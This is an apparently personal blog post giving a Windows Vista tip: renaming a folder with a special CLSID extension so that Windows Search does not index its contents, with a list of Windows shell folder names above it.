Start Menu
Startup
SyncCenterFolder
SyncResultsFolder
SyncSetupFolder
System
SystemCertificates
SystemX86
Templates
TreePropertiesFolder
UserProfiles
UsersFilesFolder
Windows

Love happen's once and the rest is just life!!!!

Hide Contents of A Folder From Vista Indexer !!

The idea behind this Vista tip is to create a folder which is invisible from the indexer. Please note that the files are neither encrypted nor hidden from anyone looking with Windows Explorer.

For your files to remain hidden, this secret folder needs a special extension
.{26EE0668-A00A-44D7-9371-BEB064C98683}.

Create a normal folder, for example stuff. Now rename it with this special clsid extension. You will need the dot and the curly brackets.

stuff.{26EE0668-A00A-44D7-9371-BEB064C98683}

Testing your hidden files

Create a file inside your folder with the .{26EE0668-A00A-44D7-9371-BEB064C98683} extension. For example 'Guy Stuff.doc'. Now search for Guy Stuff.doc. You should get a negative result, Vista's search will ignore files in this folder.

Just in case you believe this is a false result due to slow indexing, create another document in a regular folder, search for that document. You should have a positive result.

There is a fancy variation of my non-indexing tip, what you do is use a different clsid extension.
.{645FF040-5081-101B-9F08-00AA002F954E}

Love happen's once and the rest is just life!!!!
Newer Posts Older Posts Home
>